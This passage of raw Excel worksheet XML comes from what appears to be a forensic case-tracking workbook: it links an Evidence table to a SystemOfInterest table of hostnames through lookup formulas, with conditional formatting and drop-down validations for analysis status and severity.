      <c r="K12" s="87"/>
    </row>
    <row r="13" spans="1:19">
      <c r="B13" s="87"/>
      <c r="G13" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J13" s="87"/>
      <c r="K13" s="87"/>
    </row>
    <row r="14" spans="1:19">
      <c r="B14" s="87"/>
      <c r="G14" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J14" s="87"/>
      <c r="K14" s="87"/>
    </row>
    <row r="15" spans="1:19">
      <c r="B15" s="87"/>
      <c r="G15" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J15" s="87"/>
      <c r="K15" s="87"/>
    </row>
    <row r="16" spans="1:19">
      <c r="B16" s="87"/>
      <c r="G16" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J16" s="87"/>
      <c r="K16" s="87"/>
    </row>
    <row r="17" spans="1:19">
      <c r="B17" s="87"/>
      <c r="G17" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J17" s="87"/>
      <c r="K17" s="87"/>
    </row>
    <row r="18" spans="1:19">
      <c r="B18" s="87"/>
      <c r="G18" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J18" s="87"/>
      <c r="K18" s="87"/>
    </row>
    <row r="19" spans="1:19">
      <c r="B19" s="87"/>
      <c r="G19" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J19" s="87"/>
      <c r="K19" s="87"/>
    </row>
    <row r="20" spans="1:19">
      <c r="B20" s="87"/>
      <c r="G20" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J20" s="87"/>
      <c r="K20" s="87"/>
    </row>
    <row r="21" spans="1:19">
      <c r="B21" s="87"/>
      <c r="G21" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J21" s="87"/>
      <c r="K21" s="87"/>
    </row>
    <row r="22" spans="1:19">
      <c r="B22" s="87"/>
      <c r="G22" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J22" s="87"/>
      <c r="K22" s="87"/>
    </row>
    <row r="23" spans="1:19">
      <c r="B23" s="87"/>
      <c r="G23" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J23" s="87"/>
      <c r="K23" s="87"/>
    </row>
    <row r="24" spans="1:19">
      <c r="B24" s="87"/>
      <c r="G24" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J24" s="87"/>
      <c r="K24" s="87"/>
    </row>
    <row r="25" spans="1:19">
      <c r="B25" s="87"/>
      <c r="G25" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J25" s="87"/>
      <c r="K25" s="87"/>
    </row>
    <row r="26" spans="1:19">
      <c r="B26" s="87"/>
      <c r="G26" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J26" s="87"/>
      <c r="K26" s="87"/>
    </row>
    <row r="27" spans="1:19">
      <c r="B27" s="87"/>
      <c r="G27" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J27" s="87"/>
      <c r="K27" s="87"/>
    </row>
    <row r="28" spans="1:19">
      <c r="B28" s="87"/>
      <c r="G28" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J28" s="87"/>
      <c r="K28" s="87"/>
    </row>
    <row r="29" spans="1:19">
      <c r="B29" s="87"/>
      <c r="G29" s="75" t="str">
        <f>IFERROR(VLOOKUP(Evidence[[#This Row],[Hostname]],SystemOfInterest[],5,0),"")</f>
        <v/>
      </c>
      <c r="J29" s="87"/>
      <c r="K29" s="87"/>
    </row>
    <row r="30" spans="1:19">
      <c r="A30" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B30" s="9"/>
      <c r="C30" s="9"/>
      <c r="D30" s="9"/>
      <c r="E30" s="9"/>
      <c r="F30" s="9"/>
      <c r="G30" s="9"/>
      <c r="H30" s="110"/>
      <c r="I30" s="9"/>
      <c r="J30" s="9"/>
      <c r="K30" s="9"/>
      <c r="L30" s="9"/>
      <c r="M30" s="9"/>
      <c r="N30" s="9"/>
      <c r="O30" s="9"/>
      <c r="P30" s="9"/>
      <c r="Q30" s="9"/>
      <c r="R30" s="9"/>
      <c r="S30" s="10"/>
    </row>
  </sheetData>
  <phoneticPr fontId="4" type="noConversion"/>
  <conditionalFormatting sqref="A2:S29">
    <cfRule type="expression" dxfId="219" priority="7">
      <formula>AND(NOT(ISBLANK($A2)),ISERROR(MATCH($A2,INDIRECT("SystemOfInterest[Hostname]"),0)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C2:C29">
    <cfRule type="expression" dxfId="218" priority="28">
      <formula>AND(ISBLANK($C2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2:B29">
    <cfRule type="expression" dxfId="217" priority="15">
      <formula>AND(ISBLANK($B2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="T4">
    <cfRule type="iconSet" priority="12">
      <iconSet iconSet="3Symbols">
        <cfvo type="percent" val="0"/>
        <cfvo type="percent" val="33"/>
        <cfvo type="percent" val="67"/>
      </iconSet>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D2:D29">
    <cfRule type="expression" dxfId="216" priority="27">
      <formula>AND(ISBLANK($D2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E2:E29">
    <cfRule type="cellIs" dxfId="215" priority="9" operator="equal">
      <formula>"Assigned"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="214" priority="10" operator="equal">
      <formula>"Completed analysis"</formula>
    </cfRule>
    <cfRule type="expression" dxfId="213" priority="11">
      <formula>AND(ISBLANK($E2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1:E1048576">
    <cfRule type="cellIs" dxfId="212" priority="8" operator="equal">
      <formula>"Ongoing analysis"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H2:H29">
    <cfRule type="cellIs" dxfId="211" priority="3" operator="equal">
      <formula>"Low"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="210" priority="4" operator="equal">
      <formula>"Medium"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="209" priority="5" operator="equal">
      <formula>"High"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="208" priority="6" operator="equal">
      <formula>"Critical"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A2:A29">
    <cfRule type="expression" dxfId="207" priority="2">
      <formula>AND(ISBLANK($A2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F2:F29">
    <cfRule type="duplicateValues" dxfId="206" priority="1"/>
  </conditionalFormatting>
  <dataValidations count="3">
    <dataValidation allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="OS Type" prompt="This cell is automatically populated. Avoid overwriting manually to prevent discrepencies." sqref="G2:G29" xr:uid="{CA78DE87-4818-49CB-A6DF-00E8534F48B2}"/>
    <dataValidation type="list" operator="greaterThanOrEqual"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29" xr:uid="{FB66E76F-2E17-436B-AD9E-EF1FE078157E}">
      <formula1>members_NamedRange</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29" xr:uid="{0DA5AD84-9F17-446D-8E35-E2E2F8A0B482}">
      <formula1>TODAY()</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5">
        <x14:dataValidation type="list" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Hostname Entered" error="Please enter a valid hostname from the drop down list._x000a__x000a_If the hostname is not present in the drop down list, it needs to be added to the system of interest first." xr:uid="{65C3B4EC-2A0A-4262-8FDF-8211B8DE593E}">
          <x14:formula1>
            <xm:f>_xlfn.ANCHORARRAY('Dropdown Lists Values'!$C$158)</xm:f>
          </x14:formula1>
          <xm:sqref>A2:A29</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" operator="greaterThanOrEqual" showErrorMessage="1" errorTitle="Invalid Member Entered" error="The member you have added does not exist. Please use the drop down menu to select a valid member of this engagement._x000a__x000a_Alternatively, you may add yourself to the 'Member' Table in the 'Engagement Details' Sheet." xr:uid="{DE22AAB4-4247-4BAA-8C73-13AEACA38E96}">
          <x14:formula1>
            <xm:f>'Case summary'!$A$13:$A$16</xm:f>
          </x14:formula1>
          <xm:sqref>I2:I29 L2:M29</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" operator="greaterThanOrEqual" showErrorMessage="1" errorTitle="Invalid Option Entered" error="Please choose from a valid list of options from the drop down list._x000a__x000a_Alternatively if required, you may add this as an option to the drop down list by adding it in 'Dropdown Lists Values' tab under &quot;Evidence &gt; Type&quot;." xr:uid="{972483EB-CA78-45C4-95C6-47C03B7EEEA4}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$35:$C$45</xm:f>
          </x14:formula1>
          <xm:sqref>D2:D29</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" operator="greaterThanOrEqual" showErrorMessage="1" errorTitle="Invalid Option Entered" error="Please choose from a valid list of options from the drop down list._x000a__x000a_Alternatively if required, you may add this as an option to the drop down list by adding it in 'Dropdown List Values' tab under &quot;Evidence &gt; Status&quot;." xr:uid="{44FF255A-99D1-4DC7-845B-9F43069EB8BA}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$47:$C$61</xm:f>
          </x14:formula1>
          <xm:sqref>E2:E29</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{A44ECE41-7969-4EFC-B40C-B95C65B2E9E4}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$8:$C$11</xm:f>
          </x14:formula1>
          <xm:sqref>H2:H29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0062FF"/>
  </sheetPr>
  <dimension ref="A1:N26"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" workbookViewId="0">
      <pane xSplit="1" topLeftCell="B2" activePane="topRight" state="frozen"/>
      <selection pane="topRight" activeCell="I5" sqref="I5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.09765625" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="27.8984375" customWidth="1"/>
    <col min="2" max="2" width="16" customWidth="1"/>
    <col min="3" max="3" width="13.796875" customWidth="1"/>
    <col min="4" max="4" width="18.796875" customWidth="1"/>
    <col min="5" max="5" width="10.3984375" customWidth="1"/>
    <col min="6" max="6" width="17.69921875" customWidth="1"/>
    <col min="7" max="7" width="13.09765625" customWidth="1"/>
    <col min="8" max="8" width="18.69921875" customWidth="1"/>
    <col min="9" max="9" width="18.3984375" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="31.59765625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="20.69921875" customWidth="1"/>
    <col min="12" max="12" width="22.3984375" customWidth="1"/>
    <col min="13" max="13" width="29" bestFit="1" customWidth="1"/>
    <col min="14" max="14" width="96.09765625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:14">
      <c r="A1" t="s">
        <v>69</v>
      </c>
      <c r="B1" t="s">
        <v>3</v>
      </c>
      <c r="C1" t="s">
        <v>60</v>
      </c>
      <c r="D1" t="s">
        <v>84</v>
      </c>
      <c r="E1" t="s">
        <v>73</v>
      </c>
      <c r="F1" t="s">
        <v>85</v>
      </c>
      <c r="G1" t="s">
        <v>86</v>
      </c>
      <c r="H1" t="s">
        <v>87</v>
      </c>
      <c r="I1" t="s">
        <v>88</v>
      </c>
      <c r="J1" t="s">
        <v>89</v>
      </c>
      <c r="K1" t="s">
        <v>90</v>
      </c>
      <c r="L1" t="s">
        <v>91</v>
      </c>
      <c r="M1" t="s">
        <v>7</v>
      </c>
      <c r="N1" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="2" spans="1:14">
      <c r="B2" s="87"/>
      <c r="I2" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J2" s="104" t="str" cm="1">
        <f t="array" ref="J2">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M2" s="87"/>
      <c r="N2" s="94"/>
    </row>
    <row r="3" spans="1:14">
      <c r="B3" s="87"/>
      <c r="H3" t="s">
        <v>92</v>
      </c>
      <c r="I3" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J3" s="104" t="str" cm="1">
        <f t="array" ref="J3">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M3" s="87"/>
    </row>
    <row r="4" spans="1:14">
      <c r="B4" s="87"/>
      <c r="I4" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J4" s="104" t="str" cm="1">
        <f t="array" ref="J4">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M4" s="87"/>
    </row>
    <row r="5" spans="1:14">
      <c r="B5" s="87"/>
      <c r="I5" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J5" s="104" t="str" cm="1">
        <f t="array" ref="J5">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M5" s="87"/>
    </row>
    <row r="6" spans="1:14">
      <c r="B6" s="87"/>
      <c r="I6" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J6" s="104" t="str" cm="1">
        <f t="array" ref="J6">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M6" s="87"/>
    </row>
    <row r="7" spans="1:14">
      <c r="B7" s="87"/>
      <c r="I7" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J7" s="104" t="str" cm="1">
        <f t="array" ref="J7">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M7" s="87"/>
    </row>
    <row r="8" spans="1:14">
      <c r="B8" s="87"/>
      <c r="I8" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J8" s="104" t="str" cm="1">
        <f t="array" ref="J8">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M8" s="87"/>
    </row>
    <row r="9" spans="1:14">
      <c r="B9" s="87"/>
      <c r="I9" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J9" s="104" t="str" cm="1">
        <f t="array" ref="J9">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M9" s="87"/>
    </row>
    <row r="10" spans="1:14">
      <c r="B10" s="87"/>
      <c r="I10" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J10" s="104" t="str" cm="1">
        <f t="array" ref="J10">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M10" s="87"/>
    </row>
    <row r="11" spans="1:14">
      <c r="B11" s="87"/>
      <c r="I11" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J11" s="104" t="str" cm="1">
        <f t="array" ref="J11">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M11" s="87"/>
    </row>
    <row r="12" spans="1:14">
      <c r="B12" s="87"/>
      <c r="I12" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J12" s="104" t="str" cm="1">
        <f t="array" ref="J12">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M12" s="87"/>
    </row>
    <row r="13" spans="1:14">
      <c r="B13" s="87"/>
      <c r="I13" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J13" s="104" t="str" cm="1">
        <f t="array" ref="J13">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M13" s="87"/>
    </row>
    <row r="14" spans="1:14">
      <c r="B14" s="87"/>
      <c r="I14" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J14" s="104" t="str" cm="1">
        <f t="array" ref="J14">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M14" s="87"/>
    </row>
    <row r="15" spans="1:14">
      <c r="B15" s="87"/>
      <c r="I15" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J15" s="104" t="str" cm="1">
        <f t="array" ref="J15">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M15" s="87"/>
    </row>
    <row r="16" spans="1:14">
      <c r="B16" s="87"/>
      <c r="I16" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J16" s="104" t="str" cm="1">
        <f t="array" ref="J16">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M16" s="87"/>
    </row>
    <row r="17" spans="1:14">
      <c r="B17" s="87"/>
      <c r="I17" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J17" s="104" t="str" cm="1">
        <f t="array" ref="J17">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M17" s="87"/>
    </row>
    <row r="18" spans="1:14">
      <c r="B18" s="87"/>
      <c r="I18" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J18" s="104" t="str" cm="1">
        <f t="array" ref="J18">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M18" s="87"/>
    </row>
    <row r="19" spans="1:14">
      <c r="B19" s="87"/>
      <c r="I19" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J19" s="104" t="str" cm="1">
        <f t="array" ref="J19">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M19" s="87"/>
    </row>
    <row r="20" spans="1:14">
      <c r="B20" s="87"/>
      <c r="I20" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J20" s="104" t="str" cm="1">
        <f t="array" ref="J20">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M20" s="87"/>
    </row>
    <row r="21" spans="1:14">
      <c r="B21" s="87"/>
      <c r="I21" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J21" s="104" t="str" cm="1">
